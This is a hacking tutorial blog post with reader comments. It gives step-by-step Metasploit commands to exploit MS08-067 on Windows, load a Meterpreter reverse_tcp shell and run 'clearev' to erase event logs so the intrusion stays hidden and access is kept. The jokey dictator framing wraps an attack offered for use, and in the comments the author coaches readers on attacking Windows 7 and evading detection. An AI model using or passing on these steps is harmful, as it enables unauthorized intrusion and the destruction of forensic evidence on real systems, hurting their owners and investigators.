Hack Like a Pro: How to Cover Your Tracks So You Aren't Detected

How to Cover Your Tracks So You Aren't Detected

Welcome back, my greenhorn hackers!

Congratulations on your successful hack that saved the world from nuclear annihilation from our little, bellicose, Twinkie-eating dictator. The rest of world may not know what you did, but I do. Good job!

Now that we hacked into the malevolent dictator's computer and temporarily disabled his nuclear launch capability, we have to think about covering our tracks so that he and his minions can't track our good works back to us.

So, in this hack, we will go into his computer again, implant the Meterpreter and remove any trace that we had been there from his log files. Let's fire up Metasploit and get to work on removing any evidence that we had ever been on the dictator's computer.

Step 1: Compromise His System Again

Let's start with the same hack we used to get into the dictator's computer initially:

exploit/windows/smb/ms08_067_netapi

But instead of using the VNC payload, we will load the Meterpreter payload. Type:

  • msf> use exploit/windows/smb/ms08_067_netapi

Before we move on, let's learn a bit more about this exploit. Type:

  • msf exploit(ms08_067_netapi) info

This should bring a screenshot below that provides us with some basic information about this exploit. We can see that this hack exploits a parsing flaw in the netapi dll. In this way, we can place our own payload on the system, which in this case is the Meterpreter.

Now we load the payload by typing:

  • msf exploit(ms08_067_netapi) set PAYLOAD windows/meterpreter/reverse_tcp

Now that we have the exploit and payload set, we need to set the options. In this case, we need to set our LHOST (us, the attacker) and the RHOST (the victim, our belligerent dictator's computer) IP addresses. Simply type in the IP address of your computer and of his computer.

Step 2: Take Control of His Computer

Now that we have everything set to take control, we just type:

  • msf exploit(ms08_067_netapi) exploit

If we are successful, we should see a Meterpreter prompt on our screen. We now have total control of his system!

At the meterpreter prompt, we now type:

  • meterpreter > clearev

As you can see in the screenshot above, this command proceeds to clear the event logs on our bellicose dictator's computer so that he and his minions have no clue that we've ever been there. If we could see the event logs on his computer, we will see that all events have been cleared.

This is critical both to protect our being found out, but also that we continue to have access to his computer. Once they know that someone has hacked his computer, it's likely they will take measures to prevent our returning to it.

Now, make sure to come back for more hacking fun and games on our dictator's computer!

Photos by The Guardian, Matthew Collingwood/Shutterstock

45 Comments

What is backrack5? I always see it up when you use Metasploit. Do we need it?

Hi Ben:

Back Track 5 is a Linux distribution with hundreds of hacking and security tools. No, you don't need it, but I recommend it.

OTW

Hi, I know this does not have to do with this article, but i have been wondering this. When I download Metasploit, it asks for the port, days of validity, and server name, what does this mean for my router? Will it cost extra? Will it show up as a opened port on the router? Sorry if this sounds newbie, I am new to this, and I would like help so I can get better.

Ben:

Are you downloading it to Windows? Or are you downloading Armitage?

You are better off just installing Back Track, but you will need to know a bit of Linux.

OTW

Oh, sorry. I'm using Windows 7.

are u really hacking onto the dictators comp,or is it a joke

Aditya:

We really hacked into the dictator's computer and saved the world ;-)

hey I would like to use Backtrack on MaC thats possible ?

hi sir hope you are fine:-
after writing the exploit command it give me this error
exploit exceptions: no matching target

Wajid:

It looks like you are attacking a Win 7 machine. Is that correct?

OTW

yes::what is wrong with that do you know any solution for that????

Wijid:

This attack is not for Windows 7. It only works for for XP, 2003, Vista and some 2008.

OTW

so can you show me how to hack windows 7 enterprise 32bit ,and windows 8???

can I hack windows 7 if yes then How????

are you there sir?????? I am waiting for your comment

Wajid:

The there are a number of different ways to hack Win 7, but they usually involve hacking one of the client side applications like the browser, Office or a PDF. I have a few tutorials on doing each of these on Null Byte. In addition, there is brand new hack of Win 7 that is out that I will put up soon.

OTW

then I should wait right?????
one more thing can you show how to install tightvnc on backtrack 5

hey these works only in virtual machine it doesn't work in 2 computer

If this is that easy, then why the most sophisticated hackers get caught?

Wajid:

Yes, you should wait or look at my tutorials on PDF or Word docs.

These work on either virtual machine or physical machine.

This just shows you a few techniques of covering your tracks. There are more that I will write about in the future. BTW, most sophisticated hackers do NOT get caught. It's the script kiddies that get caught.

OTW

Hi sir! Hope you are fine and enjoying a good health???

my question is that I can't find some of options in backtrack 5, currently I don't know are they missing from backtrack 5 or I must download it, some of the missing files like wordlist.lst, wifi-honey, fern-wifi-cracker, host, pyrift, reaver, wifite or etc....

I upgrade and update backtrack 5 r3 as will but nothing happens.

could you give a little bit instruction about it please???

Thanks

Wajid:

Try using the "locate" command to find those apps and files.

OTW

you mean by ctrl+f or search right
the search option didn't find it as will

Wajid:

I meant using the locate command in Linux. For example"

bt> locate reaver

OTW

please sir, am new to your forum, please how can i get the link to this previous tutorial

Horls:

What previous tutorial are you looking for?

OTW

this tutorial is about covering tracks then am asking of the tutorial where the attack was performed also will glad if you can help ,e with tutorial on how to attack win7 computer or higher

Horls:

I have numerous attack tutorials, but this one is from here .

OTW

Sir OTW
Will meterpreter still work as it should even if i use VPN to somehow disguise my real IP?

I really wish someone would do these tutorials using a windows computer. i realize its the hackers choice to use linux and backtrack but unfortunately not all of us have it. also you can't even use Metasploit unless you have a minimum of 16gb on your computer. Not very many people have that type of RAM and even fewer realize that is the requirement.

I'm impressed with your patience , OTW!

Will this hack only work if port 445 is open? When I used nmap to scan to see if it was open, it didn't say open or closed it said filtered, I've read a lot of your tutorials but you have never mentioned (to my knowledge) what the filtered status means. Can you use a hack over a "filtered" port? Any response would be appreciated.

Turkey:

Port 445 must be open, but that is usually not a problem as nearly every Windows machine has port 445 open (SMB). Filtering mean sthat there is likely a firewall between you and the target.

OTW

Read a comment farther up-
SniperCatz said you need a minimum of "16 gb" on your computer to run metasploit.

Did they mean 16gb of ram or 16gb of hard-disk space?

Neither. Some people's comments are simply inaccurate.

I agree. SniperCatz is wrong.

FYI. Ninja He was saying RAM "Not very many people have that type of RAM"

Metasploit takes less a 1gb of hard drive space and although Rapid7 lists 2gb as a minimum of RAM, I would recommend 4gb or more.

Is there any way to hack windows 7 remotely ??

how to delete logs specific to our hack instead off deleting full log file?

i know it's possible. i read article long ago, one hacker tried to cover his track with deleting logs specific to his hack, but unfortunately he accidently deleted some important backup logs. and get caught

Share Your Thoughts

  • Hot
  • Latest